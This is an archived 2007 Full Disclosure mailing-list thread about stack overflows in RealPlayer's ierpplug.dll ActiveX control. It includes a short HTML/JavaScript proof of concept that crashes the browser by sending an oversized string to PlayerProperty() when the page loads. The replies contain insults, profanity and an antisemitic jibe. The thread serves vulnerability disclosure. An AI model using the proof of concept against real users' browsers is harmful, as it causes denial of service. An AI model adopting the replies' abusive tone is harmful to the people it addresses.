Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
From: "Joey Mengele" <joey.mengele () hushmail com>
Date: Tue, 27 Nov 2007 11:06:38 -0500

LOLOLOLOL ok you win, client side denial of service warrants your 5 
electronic mail messages with up to the minute updates. I bet this 
one will be exploited in the wild!

Get a life LOLOL!

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb () earthlink net> wrote:
"Stack Overflow" - learn to read. A DoS attack still has some 
security implications...

-----Original Message-----
From: Joey Mengele <joey.mengele () hushmail com>
Sent: Nov 27, 2007 1:05 AM
To: full-disclosure () lists grok org uk, elazarb () earthlink net
Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer 
ierpplug.dll ActiveX Control Multiple Stack Overflows

Holy mother of Hitler will you shut the fuck up already. This is 
a 
"stack overflow" not a "stack based buffer overflow". There are 
no 
security implications here. You are worse than Jewha Mati Laurio. 


Elazar, please do not post to this list again. Please leave the 
trolling to the professionals.

J

P.S. Sorry for the swear words John.

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
<elazarb () earthlink net> wrote:
After some creative Googling, I am revising my original post. I 
believe that the Import() method overflow that I originally 
posted 
is really http://www.securityfocus.com/bid/26130, although I am 
not sure why Linux is listed under the "Vulnerable" section, so 
I 
am taking it out of the PoC code. Real claims to have patched 
this 
back in October, but I can still throw a stack overflow 
exception 
via this function using the originally stated version of 
RealPlayer(which I installed last night). I am now listing this 
vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX 
Control PlayerProperty() Method Stack Overflow, and it might be 
wise to list this under a separate BID. PoC as follows:

-------------
<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
   var s = "AAAA";

   while (s.length < 999999) s=s+s;

    var obj = new ActiveXObject("IERPCTL.IERPCTL"); //{FDC7A535-

4070-4B92-A0EA-D9994BCC0DC5}
  
     var obj2 = obj.PlayerProperty(s);


  }
 </script>

</head>
<body onload="JavaScript: return Check();">

</body>
</html> 
-------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF
rqMryjXVt31vg2H7tNd/


--
Click for your daily horoscope, learn about money, love & family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault